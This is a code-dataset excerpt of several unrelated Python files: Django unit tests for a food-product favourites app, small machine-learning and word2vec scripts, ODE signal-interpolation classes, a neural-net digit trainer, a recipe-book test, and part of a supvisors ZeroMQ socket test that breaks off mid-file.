made_in_france='TRUE',\n ingredients_text='blé, eau, sel...',\n additives=3,\n allergens_from_ingredients='',\n quantity=4,\n image_url='https://foo-foo.bar',\n packaging='papier',\n french_ingredients='TRUE',\n fair_trade='FALSE',\n vegan='TRUE',\n vegetarian='TRUE',\n gluten_free='TRUE',\n iplc='FALSE',\n nova=3,\n nutrition_grade='b',\n energy=258,\n energy_unit='kcal',\n fat=2.0,\n saturated_fat=0.1,\n sugars=20.0,\n salt=2.0,\n fiber=10.0,\n proteins=66.0\n )\n\n Food.objects.create(\n id=1,\n category='beurres',\n created=datetime.now(),\n code='0000000000000',\n name='Butter test',\n brands='Fake butter brand',\n stores='Leclerc',\n url='https://foo.bar',\n bio='TRUE',\n eco_packaging='TRUE',\n fsc='FALSE',\n utz='FALSE',\n palm_oil_free='TRUE',\n made_in_france='TRUE',\n ingredients_text='lait, eau, sel...',\n additives=3,\n allergens_from_ingredients='',\n quantity=4,\n image_url='https://foo-foo.bar',\n packaging='papier',\n french_ingredients='TRUE',\n fair_trade='FALSE',\n vegan='FALSE',\n vegetarian='FALSE',\n gluten_free='TRUE',\n iplc='FALSE',\n nova=2,\n nutrition_grade='d',\n energy=788,\n energy_unit='kcal',\n fat=70.0,\n saturated_fat=35.0,\n sugars=1.0,\n salt=2.0,\n fiber=1.0,\n proteins=26.0\n )\n\n User.objects.create_user(\n id=0,\n username='testeur_monpanier@gmail.com',\n email='testeur_monpanier@gmail.com',\n password='!MonP@nier:159357$',\n first_name='Testeur@MonPanier')\n\n Favorite.objects.create(\n products=Food.objects.get(pk=0),\n user=User.objects.get(pk=0)\n )\n\n def setUp(self):\n \"\"\"\n Set working variables\n \"\"\"\n self.factory = RequestFactory()\n self.user = User.objects.get(username='testeur_monpanier@gmail.com')\n self.new_user = {\n 'email': 'jeanpaul-dubuc@gmail.com',\n 'username': 'jeanpaul-dubuc@gmail.com',\n 'password1': '$123a456Cv789p!',\n 'password2': '$123a456Cv789p!',\n 'first_name': '(Je@anP@ul)'\n }\n self.bad_user = {\n 'email': 'toto@gmail.com',\n 'username': 'toto@gmail.com',\n 'password1': '1234',\n 'password2': '1234',\n 'first_name': 'Toto'\n }\n\n def test_food_str(self):\n food = Food(name=\"Fake name\", stores=\"Fake stores\", category=\"test\")\n self.assertIs(food.__str__(), \"test\")\n\n def test_cat_str(self):\n category = Category(category=\"test\", items=10, img_link=\"/img/laits.jpg\")\n self.assertIs(category.__str__(), \"test\")\n\n def test_item_count(self):\n \"\"\"\n Verify the count of items\n \"\"\"\n self.assertEqual(Food.objects.count(), 2)\n\n def test_item_name(self):\n \"\"\"\n Verify that a new item was created\n \"\"\"\n self.assertTrue(Food.objects.filter(name='Bread test').exists())\n\n def test_item_nova(self):\n \"\"\"\n Verify the value of a specific feature\n \"\"\"\n product = Food.objects.get(name='Butter test')\n self.assertIs(product.nova, 2)\n\n def test_results_ranking_nova(self):\n \"\"\"\n Test results view regarding\n status and returned data\n with nova ranking\n and auth user\n \"\"\"\n request = self.factory.get('/results/?q=pain&ranking=nova')\n request.user = self.user\n response = results(request)\n user_favorites = Favorite().ref_list(request)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"pains\")\n self.assertEqual(len(user_favorites), 1)\n\n def test_results_ranking_nutrition(self):\n \"\"\"\n Test results view regarding\n status and returned data\n with nutrition ranking\n and anon user\n \"\"\"\n request = self.factory.get('/results/?q=beurre&ranking=nutrition')\n request.user = AnonymousUser()\n response = results(request)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"beurres\")\n\n def test_item(self):\n \"\"\"\n Test item view regarding\n status and returned data\n with auth user\n \"\"\"\n request = self.factory.get('/item/1/')\n request.user = self.user\n response = item(request, 1)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"Butter test\")\n self.assertContains(response, \"Fake butter brand\")\n self.assertContains(response, \"Leclerc\")\n user_favorites = Favorite().ref_list(request)\n self.assertEqual(len(user_favorites), 1)\n\n def test_auth_ok(self):\n \"\"\"\n Test signin form and login\n for a valid user\n \"\"\"\n initial_count = User.objects.count()\n\n form = UserForm(data=self.new_user)\n self.assertTrue(form.is_valid())\n form.save()\n\n update_count = User.objects.count()\n self.assertEqual(update_count, initial_count + 1)\n\n user = User.objects.get(username='jeanpaul-dubuc@gmail.com')\n self.assertEqual(user.first_name, '(Je@anP@ul)')\n\n user_is_logged = self.client.login(username='jeanpaul-dubuc@gmail.com', password='$123a456Cv789p!')\n self.assertTrue(user_is_logged)\n\n def test_auth_nok(self):\n \"\"\"\n Test signin form and login\n for a not valid user\n \"\"\"\n form = UserForm(data=self.bad_user)\n self.assertFalse(form.is_valid())\n\n user_is_logged = self.client.login(username='toto@gmail.com', password='1234')\n self.assertFalse(user_is_logged)\n\n def test_my_profile_auth(self):\n \"\"\"\n Test the access to the profile page\n by an auth user and\n verify returned data\n \"\"\"\n request = self.factory.get(reverse('my_profile'))\n request.user = self.user\n response = my_profile(request)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"testeur_monpanier@gmail.com\")\n\n def test_checking_user_favorites(self):\n \"\"\"\n Check favorite list content\n \"\"\"\n request = self.factory.get(reverse('my_favorites'))\n request.user = self.user\n favorites = Food.objects.filter(favorite__user=request.user)\n response = my_favorites(request)\n self.assertEqual(response.status_code, 200)\n self.assertIsNot(len(favorites), 0)\n\n def test_save_favorites_auth(self):\n \"\"\"\n Test the response of save_favorites\n when the user is authenticated\n \"\"\"\n product = Food.objects.get(pk=1)\n user = User.objects.get(pk=0)\n response = self.client.post(reverse('save_favorites'), {'products': product, 'user': user})\n self.assertEqual(response.status_code, 302)\n\n def test_favorites_count(self):\n \"\"\"\n Test favorites count\n is incremented when a\n product was added\n \"\"\"\n request = self.client.get(reverse('save_favorites'))\n request.user = self.user\n initial_count = Favorite.objects.count()\n new = Food.objects.get(pk=1)\n favorite = Favorite()\n favorite.products = new\n favorite.user = self.user\n favorite.save()\n update_count = Favorite.objects.count()\n self.assertEqual(update_count, initial_count + 1)\n", "sub_path": "explore/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 10600, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.test.TestCase", "line_number": 18, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 29, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 39, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 44, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 48, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 52, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 56, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 120, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 120, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 156, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 156, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 156, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 165, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 165, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 165, "usage_type": "name"}, {"api_name": "django.test.RequestFactory", "line_number": 172, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 173, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 173, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 173, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.AnonymousUser", "line_number": 239, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.count", "line_number": 265, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 265, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 265, "usage_type": "name"}, {"api_name": "forms.UserForm", "line_number": 267, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.count", "line_number": 271, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 271, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 271, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 274, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 274, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 274, "usage_type": "name"}, {"api_name": "forms.UserForm", "line_number": 285, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 297, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 307, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 320, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 320, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 320, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 321, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 330, "usage_type": "call"}]} +{"seq_id": "398780199", "text": "# 사용 모델 : LogisticRegression\n# 고정 변수 항목 : review text에 쓰인 단어들, 단어 빈도\n# 분석 목표(예측값) : 리뷰가 긍정인지 부정인지 판별\n\n# 종속 변수가 0 또는 1 인 분류 예측 문제이므로 로지스틱 회귀분석 모델 사용\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nimport pickle\n\nwith open('pre_movie_review.pickle', 'rb') as file:\n label, voca, feature = pickle.load(file)\n\n# train_test_split을 사용하여 학습데이터셋, 테스트데이터셋 분리 (default : train 75%\n# test 25%\ntrain_data, test_data, train_label, test_label = train_test_split(feature, label)\n\nclassifier = LogisticRegression()\nclassifier.fit(train_data, train_label)\n\nprint('학습 정확도: %.2f %%'%(classifier.score(train_data, train_label)*100))\nprint('테스트 정확도: %.2f %%\\n'%(classifier.score(test_data,test_label)*100))\n\n# 각 피처에 대한 편회귀계수(계수별 영향도)\nweight = classifier.coef_[0, :]\npair = []\nfor index,value in enumerate(weight):\n pair.append((abs(value), voca[index]))\npair.sort(key=lambda x:x[0], reverse=True)\nfor pr in pair[:20]:\n print('영향도: %4.4f => 단어: %s'%pr)", "sub_path": "03_Bigdata/04_AI/02. Text Mining/practice/1_Count Vectorizer_TfidTransformer/4_starwars/2_text_mining_logistic.py", "file_name": "2_text_mining_logistic.py", "file_ext": "py", "file_size_in_byte": 1240, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pickle.load", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "73345998", "text": "import os\n\nimport gensim.downloader as api\nfrom gensim.models import Word2Vec, KeyedVectors\n\n\ndef print_most_similar(word_conf_pairs, k):\n for i, (word, conf) in enumerate(word_conf_pairs):\n print(f'{conf:.3f} {word}')\n if i >= k - 1:\n break\n if k < len(word_conf_pairs):\n print('...')\n\n\nif __name__ == '__main__':\n bin_file_path = 'data/text8-word2vec.bin'\n\n if not os.path.exists(bin_file_path):\n dataset = api.load('text8')\n model = Word2Vec(dataset)\n os.makedirs('data', exist_ok=True)\n model.save(bin_file_path)\n\n model = KeyedVectors.load(bin_file_path)\n\n print(print_most_similar(model.wv.similar_by_word(\"taipei\"), 5))\n", "sub_path": "2020/09/20200903_Word2Vec_similar_by_word/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 705, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.exists", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "gensim.downloader.load", "line_number": 20, "usage_type": "call"}, {"api_name": "gensim.downloader", "line_number": 20, "usage_type": "name"}, {"api_name": "gensim.models.Word2Vec", "line_number": 21, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "gensim.models.KeyedVectors.load", "line_number": 25, "usage_type": "call"}, {"api_name": "gensim.models.KeyedVectors", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "573524816", "text": "from sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.gaussian_process.kernels import (\n RBF,\n Matern,\n RationalQuadratic,\n ExpSineSquared,\n DotProduct,\n ConstantKernel,\n WhiteKernel,\n)\nimport numpy as np\nfrom scipy.interpolate import CubicSpline\nfrom collections import defaultdict\n\n\nclass BatchSignalPreprocessor(object):\n def __init__(self, t, data, method):\n self.prepocessors = defaultdict()\n if method == \"SplineSignalPreprocessor\":\n for key, datum in data.items():\n self.prepocessors[key] = SplineSignalPreprocessor(t, datum)\n\n def interpolate(self, t_new):\n ret_data = defaultdict()\n for key, preprocessor in self.prepocessors.items():\n ret_data[key] = preprocessor.interpolate(t_new)\n return ret_data\n\n def calculate_time_derivative(self, t_new):\n ret_data = defaultdict()\n for key, preprocessor in self.prepocessors.items():\n ret_data[key] = preprocessor.calculate_time_derivative(t_new)\n return ret_data\n\n\nclass SignalPreprocessor(object):\n def __init__(self, t, y):\n self._dydt = None\n self.y = y\n self.t = t\n\n @property\n def dydt(self):\n # TODO add checks\n return self._dydt\n\n @dydt.setter\n def dydt(self, new_value):\n raise ValueError(\n \"dydt cannot be changed from the outside of the object!\"\n )\n\n\nclass GPSignalPreprocessor(SignalPreprocessor):\n def __init__(self, t, y, selected_kernel=\"RBF\"):\n super().__init__(t, y)\n self.kernels = None\n self.selected_kernel = selected_kernel\n\n # Create different kernels that will be explored\n self.kernels = dict()\n\n self.kernels[\"RBF\"] = 1.0 * RBF(\n length_scale=0.5, length_scale_bounds=(1e-1, 100.0)\n )\n self.kernels[\"RatQuad\"] = 1.0 * RationalQuadratic(\n length_scale=1.0, alpha=0.2\n )\n self.kernels[\"ExpSineSquared\"] = 1.0 * ExpSineSquared(\n length_scale=1.0,\n periodicity=3,\n length_scale_bounds=(0.1, 10.0),\n periodicity_bounds=(1.0, 10.0),\n )\n self.kernels[\"Matern\"] = 1.0 * Matern(\n length_scale=1.0, length_scale_bounds=(1e-1, 100.0), nu=1.5\n )\n\n if selected_kernel not in self.kernels.keys():\n raise KeyError(\n f\"Unknown kernel: {selected_kernel}, available kernels: {self.kernels.keys()}\"\n )\n\n # Generate the noisy kernels\n self.noisy_kernels = dict()\n for key, kernel in self.kernels.items():\n self.noisy_kernels[key] = kernel + WhiteKernel(\n noise_level=1, noise_level_bounds=(1e-3, 1e3)\n )\n\n def interpolate(self):\n # Adjust the number of samples to be drawn from the fitted GP\n gp_samples = 1\n\n acutal_kernel = self.noisy_kernels[self.selected_kernel]\n gp = GaussianProcessRegressor(kernel=acutal_kernel)\n\n X = self.t[:, np.newaxis]\n gp.fit(X, self.y)\n\n self.A_mean, A_std = gp.predict(X, return_std=True)\n _, self.K_A = gp.predict(X, return_cov=True)\n y_samples = gp.sample_y(X, gp_samples)\n\n return y_samples\n\n def calculate_time_derivative(self):\n dA_mean = np.diff(self.A_mean)\n dTime = np.diff(self.t)\n dTime = np.append(dTime, [dTime[-1]])\n dA_mean = np.append(dA_mean, [dA_mean[-1]]) / dTime\n\n self._dydt = dA_mean\n\n def diff_matrix(self, size):\n \"\"\"Differentiation matrix -- used as a linear operator\"\"\"\n A = np.zeros((size, size))\n b = np.ones(size - 1)\n np.fill_diagonal(A[0:], -b)\n np.fill_diagonal(A[:, 1:], b)\n return A\n\n\nclass SplineSignalPreprocessor(SignalPreprocessor):\n def __init__(self, t, y):\n super().__init__(t, y)\n self.cs = None\n\n def interpolate(self, t_new):\n self.cs = CubicSpline(self.t, self.y)\n\n return self.cs(t_new)\n\n def calculate_time_derivative(self, t_new):\n if self.cs is None:\n self.interpolate(t_new=t_new)\n\n pp = self.cs.derivative()\n return pp(t_new)\n\n\nclass RHSEvalSignalPreprocessor(SignalPreprocessor):\n def __init__(self, t, y, rhs_function, states):\n super().__init__(t, y)\n self.rhs_function = rhs_function\n self.states = states\n\n def interpolate(self):\n pass\n\n def calculate_time_derivative(self):\n rr = list()\n for yy in self.y.T:\n rr.append(self.rhs_function(0, yy, self.states))\n\n self._dydt = np.array(rr).T\n\n\nclass ZeroOrderHoldPreprocessor(SignalPreprocessor):\n def __init__(self, t, y):\n super(ZeroOrderHoldPreprocessor, self).__init__(t=t, y=y)\n\n def calculate_time_derivative(self):\n raise NotImplementedError(\n \"Time derivative calculation is not implemented for Zero order hold!\"\n )\n\n def interpolate(self, t_new):\n # TODO ZAT support non pandas data format too!\n ret = []\n if isinstance(t_new, float):\n return self.y[abs(self.t - t_new).idxmin()]\n\n for t_i in t_new:\n ret.append(self.y[abs(self.t - t_i).idxmin()])\n return ret\n", "sub_path": "Docker-Django/app/env/lib/python3.8/site-packages/ode_composer/signal_preprocessor.py", "file_name": "signal_preprocessor.py", "file_ext": "py", "file_size_in_byte": 5254, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "collections.defaultdict", "line_number": 18, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 24, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.gaussian_process.kernels.RBF", "line_number": 63, "usage_type": "call"}, {"api_name": "sklearn.gaussian_process.kernels.RationalQuadratic", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.gaussian_process.kernels.ExpSineSquared", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.gaussian_process.kernels.Matern", "line_number": 75, "usage_type": "call"}, {"api_name": "sklearn.gaussian_process.kernels.WhiteKernel", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.gaussian_process.GaussianProcessRegressor", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 98, "usage_type": "attribute"}, {"api_name": "numpy.diff", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 120, "usage_type": "call"}, {"api_name": "scipy.interpolate.CubicSpline", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 156, "usage_type": "call"}]} +{"seq_id": "101966709", "text": "# import\n## batteries\nimport os\nimport sys\nimport pytest\n## 3rd party\nimport numpy as np\n## package\nfrom DeepMAsED.Commands import Predict as Predict_CMD\n\n# test/data dir\ntest_dir = os.path.join(os.path.dirname(__file__))\ndata_dir = os.path.join(test_dir, 'data')\n\n\ndef test_help():\n args = ['-h']\n with pytest.raises(SystemExit) as pytest_wrapped_e:\n Predict_CMD.parse_args(args)\n assert pytest_wrapped_e.type == SystemExit\n assert pytest_wrapped_e.value.code == 0\n\ndef test_predict(tmp_path):\n indir = os.path.join(data_dir, 'deepmased_trained')\n outdir = os.path.join(tmp_path, 'predict_cpu')\n args = ['--cpu_only', '--data_path', indir, '--save_path', outdir]\n args = Predict_CMD.parse_args(args)\n Predict_CMD.main(args)\n F = os.path.join(outdir,'predictions', 'deepmased_trained', 'predictions.csv')\n assert os.path.isfile(F)\n \n", "sub_path": "tests/test_Predict.py", "file_name": "test_Predict.py", "file_ext": "py", "file_size_in_byte": 876, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 18, "usage_type": "call"}, {"api_name": "DeepMAsED.Commands.Predict.parse_args", "line_number": 19, "usage_type": "call"}, {"api_name": "DeepMAsED.Commands.Predict", "line_number": 19, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "DeepMAsED.Commands.Predict.parse_args", "line_number": 27, "usage_type": "call"}, {"api_name": "DeepMAsED.Commands.Predict", "line_number": 27, "usage_type": "name"}, {"api_name": "DeepMAsED.Commands.Predict.main", "line_number": 28, "usage_type": "call"}, {"api_name": "DeepMAsED.Commands.Predict", "line_number": 28, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}]} +{"seq_id": "145996662", "text": "from NN_core import *\n\nimport scipy.optimize as opt\n\n\n# constants\ninput_layer_size = 400 # 20x20 Input Images of Digits\nhidden_layer_size = 25 # 25 hidden units\nnum_labels = 10 # 10 labels, from 1 to 10\n\n# load image data\ndigit_data = np.genfromtxt('data/digit_data_X.csv', delimiter=',', dtype='float')\ndigit_data_y = np.genfromtxt('data/digit_data_y.csv', delimiter=',', dtype='float')\n\n# load nn parameters theta:\n#theta1 = np.genfromtxt('data/Theta1_test.csv', delimiter=',', dtype='float')\n#theta2 = np.genfromtxt('data/Theta2_test.csv', delimiter=',', dtype='float')\n\n\n## Train the NN useing fmin_cg from scipy.optimization\n\nprint('Training Neural Network ...')\ninitial_Theta1 = random_initialize_weights(input_layer_size, hidden_layer_size)\ninitial_Theta2 = random_initialize_weights(hidden_layer_size, num_labels)\np = predict(initial_Theta1, initial_Theta2, digit_data)\nacc = np.mean(((p+1) == digit_data_y))*100 # prediction accuracy\nprint('Training Set Accuracy BEFORE training is ' + str(acc) + '%')\n\ninitial_nn_params = np.vstack((initial_Theta1.ravel().reshape(initial_Theta1.size, 1), initial_Theta2.ravel().reshape(initial_Theta2.size, 1)))\nlambda_ = 1 # regularization\ncostFunc = lambda p: cost_J_only(p, input_layer_size, hidden_layer_size, num_labels, digit_data, digit_data_y, lambda_)\ngradFunc = lambda p: cost_grad_only(p, input_layer_size, hidden_layer_size, num_labels, digit_data, digit_data_y, lambda_)\n\nnn_params = opt.fmin_cg(costFunc, initial_nn_params, fprime=gradFunc, maxiter=50)\nTheta1 = nn_params[:hidden_layer_size * (input_layer_size + 1)].reshape(hidden_layer_size, input_layer_size + 1)\nTheta2 = nn_params[(hidden_layer_size * (input_layer_size + 1)):].reshape(num_labels, (hidden_layer_size + 1))\np = predict(Theta1, Theta2, digit_data)\nacc = np.mean(((p+1) == digit_data_y))*100 # prediction accuracy\nprint('Training Set Accuracy AFTER TRAINING is ' + str(acc) + '%')\ninput(\"Press Enter to continue...\")\n\n# prediction demo\nm = digit_data.shape[0]\nm_perm = np.random.permutation(m)\nfor i in m_perm[0:10]:\n plt.imshow(digit_data[m_perm[i], :].reshape(20, 20), cmap='gray')\n plt.ion()\n plt.show()\n plt.pause(0.001)\n p = predict(Theta1, Theta2, (digit_data[m_perm[i], :]))\n print('Neural Network Prediction: ' + str(np.mod(p + 1, 10)))\n input(\"Press Enter to continue...\")\n", "sub_path": "NN_digits_learn.py", "file_name": "NN_digits_learn.py", "file_ext": "py", "file_size_in_byte": 2336, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "scipy.optimize.fmin_cg", "line_number": 34, "usage_type": "call"}, {"api_name": "scipy.optimize", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "128422465", "text": "from book import Book\nfrom recipe import Recipe\nimport datetime\n\n\nsalad = Recipe(\"salad\", 1, 10, [\"tomatoes\", \"lettuce\", \"mozza\"], \"simple salad\", \"starter\")\nsandwich = Recipe(\"sandwich\", 1, 5, [\"bread\", \"ham\", \"tomatoes\", \"olive oil\"], \"easy sandwich\", \"lunch\")\nmelon = Recipe(\"melon with jam\", 2, 10, [\"melon\", \"ham (jamon)\"], \"typical slices of melon with ham\", \"starter\")\n\n#to_print = str(salad)\n#print(to_print)\n\nrecipes_list = {\n\t'starter' : [],\n\t'lunch' : [],\n\t'dessert' : [],\n}\n\ncookbook = Book(\"cookbook\", datetime.datetime.now(), datetime.date.today(), recipes_list)\ncookbook.add_recipe(salad)\ncookbook.add_recipe(melon)\ncookbook.add_recipe(sandwich)\nx = 1\ncookbook.add_recipe(x)\ncookbook.get_recipe_by_name('melon with jam')\n#cookbook.get_recipes_by_type('starter')\nprint(cookbook.last_update)\n", "sub_path": "day01/ex00/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 805, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "recipe.Recipe", "line_number": 6, "usage_type": "call"}, {"api_name": "recipe.Recipe", "line_number": 7, "usage_type": "call"}, {"api_name": "recipe.Recipe", "line_number": 8, "usage_type": "call"}, {"api_name": "book.Book", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 19, "usage_type": "attribute"}]} +{"seq_id": "432867692", "text": "#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\n# ======================================================================\n# Copyright 2017 Julien LE CLEACH\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ======================================================================\n\nimport os\nimport sys\nimport time\nimport unittest\nimport zmq\n\nfrom supvisors.tests.base import MockedSupvisors\n\n\nclass ZmqSocketTest(unittest.TestCase):\n \"\"\" Test case for the ZeroMQ sockets created in the supvisorszmq module. \"\"\"\n\n def setUp(self):\n \"\"\" Create a dummy supvisors and a ZMQ context. \"\"\"\n # the dummy Supvisors is used for addresses and ports\n self.supvisors = MockedSupvisors()\n # create the ZeroMQ context\n self.zmq_context = zmq.Context.instance()\n\n def test_internal_publish_subscribe(self):\n \"\"\" Test the ZeroMQ publish-subscribe sockets used internally\n in Supvisors. \"\"\"\n from supvisors.supvisorszmq import (InternalEventPublisher,\n InternalEventSubscriber)\n # create publisher and subscriber\n publisher = InternalEventPublisher(\n self.supvisors.address_mapper.local_address,\n self.supvisors.options.internal_port,\n self.supvisors.logger)\n subscriber = InternalEventSubscriber(\n self.supvisors.address_mapper.addresses,\n self.supvisors.options.internal_port)\n # check that the ZMQ sockets are ready\n self.assertFalse(publisher.socket.closed)\n self.assertFalse(subscriber.socket.closed)\n # close the sockets\n publisher.close()\n subscriber.close()\n # check that the ZMQ socket are closed\n self.assertTrue(publisher.socket.closed)\n self.assertTrue(subscriber.socket.closed)\n\n def test_external_publish_subscribe(self):\n \"\"\" Test the ZeroMQ publish-subscribe sockets used in the event\n interface of Supvisors. \"\"\"\n from supvisors.supvisorszmq import EventPublisher, EventSubscriber\n # get event port\n port = self.supvisors.options.event_port\n # create publisher and subscriber\n publisher = EventPublisher(port, self.supvisors.logger)\n subscriber = EventSubscriber(zmq.Context.instance(), port,\n self.supvisors.logger)\n # check that the ZMQ sockets are ready\n self.assertFalse(publisher.socket.closed)\n self.assertFalse(subscriber.socket.closed)\n # close the sockets\n publisher.close()\n subscriber.close()\n # check that the ZMQ socket are closed\n self.assertTrue(publisher.socket.closed)\n self.assertTrue(subscriber.socket.closed)\n\n def test_internal_pusher_puller(self):\n \"\"\" Test the ZeroMQ push-pull sockets used internally in Supvisors. \"\"\"\n from supvisors.supvisorszmq import RequestPusher, RequestPuller\n # create publisher and subscriber\n pusher = RequestPusher(self.supvisors.logger)\n puller = RequestPuller()\n # check that the ZMQ sockets are ready\n self.assertFalse(pusher.socket.closed)\n self.assertFalse(puller.socket.closed)\n # close the sockets\n pusher.close()\n puller.close()\n # check that the ZMQ socket are closed\n self.assertTrue(pusher.socket.closed)\n self.assertTrue(puller.socket.closed)\n\n\nclass InternalEventTest(unittest.TestCase):\n \"\"\" Test case for the InternalEventPublisher and InternalEventSubscriber\n classes of the supvisorszmq module. \"\"\"\n\n def setUp(self):\n \"\"\" Create a dummy supvisors, ZMQ context and sockets. \"\"\"\n from supvisors.supvisorszmq import (InternalEventPublisher,\n InternalEventSubscriber)\n # the dummy Supvisors is used for addresses and ports\n self.supvisors = MockedSupvisors()\n # create publisher and subscriber\n self.publisher = InternalEventPublisher(\n self.supvisors.address_mapper.local_address,\n self.supvisors.options.internal_port,\n self.supvisors.logger)\n 